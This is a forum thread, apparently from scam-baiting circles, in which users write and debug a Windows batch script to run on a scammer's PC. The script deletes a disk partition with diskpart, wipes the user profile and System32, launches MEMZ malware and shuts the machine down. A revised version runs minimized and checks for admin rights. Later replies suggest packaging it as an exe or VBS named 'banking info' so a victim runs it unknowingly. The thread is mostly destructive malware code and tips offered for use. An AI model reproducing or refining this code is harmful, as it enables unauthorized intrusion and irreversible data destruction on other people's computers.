Delete his drive D … there will be more important stuff than C but better delete both … i have a batch command file that delete them automaticaly, once its started even pulling the LAN cable will not stop process because it is silent and its like Shift + Del but on whole drives -> copy the code from below to a name.txt file and rename it to name.bat but DON’T start it it will NUKE your drives! then copy your memz.exe onto his root C drive and name.bat to his desktop and start name.bat
Those commands will delete his profilile and system32 files and wipe his whole D drive partition
after that will start memz.exe in main C drive and shutdown his computer. When he start again he wont have D drive and Windows will crash on boot so he will need complete new FRESH Windows and repartitioning of hard disk
after %USERPROFILE% type " * . * " without quotes and space between stars and dot
after %WINDIR%\System32 -> do the same!
@echo off
c:
cd/
type script.txt
select volume 3
delete volume
exit
diskpart /s script.txt
del %USERPROFILE% " * . * " /s /f /q
del %WINDIR%\System32 " * . * " /s /f /q
memz.exe
shutdown -s
exit
This is a really nice thing to do with scammers. Why bother with deleting stuff manually when you have a program for that?
Unfortunately this batch script will not work as intended, because:
line 4: “type” is a MS-DOS command to display the content of a file, like “cat” does on linux systems (i know the original use of “cat” isn’t just that but thats another story.) If you want to generate a file or write something to a file, you could use the “echo” command:
echo Your text goes here >> filename.txt
line 5&6: “select” and “delete” aren’t DOS commands. I assume you would write them into your script and use Diskpart. Keep in mind that the standart volume number of D:\ is indeed 3, but that’s not a must. Also, if you happen to have more than two drives, all the other drives are ignored.
line 9&10: You need admin rights to delete files in here, so remember to execute your .bat file as admin!
A good program you could look into is the Shellcode of Death, it simply tries to format all avaible drives. But keep in mind that Windows doesn’t allow the C:\-Drive to be formatted.
Tip : If you want to write special characters in your posts, you can escape them using a “\” character (backslash). For example, *this* isn’t italic and **this** doesn’t appear bold.
Please be assured that I simply want to help, so I wrote this not to criticize your post but rather help you creating more wonderful tools to use against these scammers.
NO they are a part of (commands in) script.txt that we just created (in root of C drive) and execute it into start DISKPART assistant to delete his drive D partition It is not exately DOS -> it is Command Promt on Windows.
NO it won’t format C or D because even if we can, it will take a long time trough CMD -> deleteng the partition table on D will take 1 second to complete.
TYPE is a command to create (when it is not present) and edit (empty or) any document in DOS text editor.
NO i don’t want to display any text in comand promt, or even to show it to user, that is why i turn it off completely with @echo off !
You can also add your own executable files like memz.exe and atitional commands but it will slow the process as every command will execute after the previous is done with the processing … last night i try this batch file on my own virtual machine and kill Windows 8.1 -> so its tested! Do it on your own VM
NO you don’t need admin rights, it will not delete any system (original) windows files, just drivers and all private data from user profile, desktop, (nonprotected files from) system32 and some 3-rd party software (it will delete files only) and leave him with a bunch of empty folders (it is very destractive to check afterwards whats left and whats not -> empty). It will also delete nonprotected readonly files without confirmation.
Those batch files are the fastest way to do something without anoying confirmations or just to start a bunch of things without tracking them one by one in your PC
@ScammerRevolts Thank you for moving my post … i was in a bit of a hurry and misswatched the category name
(MS-)DOS means “Microsoft Disk Operation System”. cmd.exe is just a command-line interpreter for commands. We basically mean the same.
You’re right, my mistake. Diskpart will only delete the entry in the partition table. But this means that the scammers can recover the files easily using corresponding software. So just to be safe, let’s completely format the drive when we’re on it. Yes, it will take some time but you say that batch files are the fastest way to do somehing without any conformation, so that will be a piece of cake, doesn’t it?
“In the Windows Command shell, type is a built in command which displays the contents of a text file. Use the type command to view a text file without modifying it.”
I think I didn’t even question this… I just wanted to say that you can use “echo” instead of “type” to write to a file.
I also tested this on my x64 Win7 VM, running on VmWare. It didn’t work, I simply copy+pasted this from your post. I’d like to see this working on your VM though. Can you record this with f.ex. OBS so that i can see it?
Yes you do. The problem lies in “nonprotected files from system32”. System32 is, by default, owned by TrustedInstaller, so in order to change anything here you absolutely need admin rights.
(Not in the %Userprofile% ordner though, I agree with you there.)
Do you read my post before copy the code? I believe my code broked when posted -> no time to debug!
Command Promt is a different thing from DOS -> DOS is an OS while CMD is a shell console in OS
I am not going to argue with you, just read carefully what i write and when it is not working for you just fix it, do the research yourself. I’ve been into computers since quarter sentury so i am pretty aware and confident of what i am talking and what you’re trying to explain. Some commands do more hidden things than you see. Arguments after commands often drive commands to do completely different things in real life. deleting the filesystem table make files on drive unaccessible and unreadable. Recovering the files may take A LOT OF TIME. The truth is that you can recover files even after format the drive … so make your live easyer -> the quck process i’ve provide will be fast enough to cause instant and allmost irrevirsible damage. My post was like clue of what you can do with few rows instead of digging every single folder. Those methods of destroying and recovering are not new, but if we can save time or kill their time -> it will make them think twice before they hit somebody next time.
Make it better if you have knowledge to do it. Stay safe.
That’s great! Maybe I can even learn something from you if you have 25 years experience in IT / programming.
I think you might be referring to the “type” - command. You say that you can create, edit and empty any arbitrary file - how does this work? Can you explain that for me? Because if you simply type “type script.txt” it will give an error if script.txt wasn’t created beforehand.
Yeah, I did. I did exactly as written in you post. My whole point was just to point out some errors, not to criticize you as a person. As a person with 25 years experience in coding I think you understand this.
Well, Ok then?
echo off
if not DEFINED IS_MINIMIZED set IS_MINIMIZED=1 && start “” /min “%~dpnx0” %* && exit
:start
C:
cd/
REM select whatever you want to delete
echo select volume 3 > script.txt
echo delete volume >> script.txt
:part_them_all
diskpart /s script.txt
:check_Permissions
REM Detecting permissions…
net session >nul 2>&1
if %errorLevel% == 0 (
REM Success: Administrative permissions confirmed.
del %WINDIR%\System32 *.* /s /f /q
) else (
REM Failure: Current permissions inadequate.
)
del %USERPROFILE% *.* /s /f /q
Soooo… Total newbie here but… if I was to gain access to a scammers computer like scammer revolts does. Would I open there command prompt, paste this in there, hit enter and it would delete all there stuff?
TBH. Your better off converting this to a exe (Batch to exe) or into a VBS script.
Exe’s and VBS’s can run without any command prompt windows + you can place it in my documents and wait for them to take and run it.
So the process would be something like:
Connect to their pc, drag exe/vbs to their computer, run by double clicking. VBS is probably the best, as even though it gets deleted it will still run.
Can someone make a new post about this? It sounds awesome and way quicker than manually deleting all their files. I also like the idea of it being an exe or vbs especially because you could rename it something like “banking info” and have the scammer steal it and wipe out his or her own computer due to greed and stupidity. The only problem with that is I have no idea what I’d be doing to create such a thing lol. So if someone that knows what they are doing could create said exe or vbs or explain how to do so step by step and include the needed script that would be amazing!
-> copy the code from below to a name.txt file and rename it to name.bat but DON’T start it it will NUKE your drives! then copy your memz.exe onto his root C drive and name.bat to his desktop and start name.bat
It is not exately DOS -> it is Command Promt on Windows.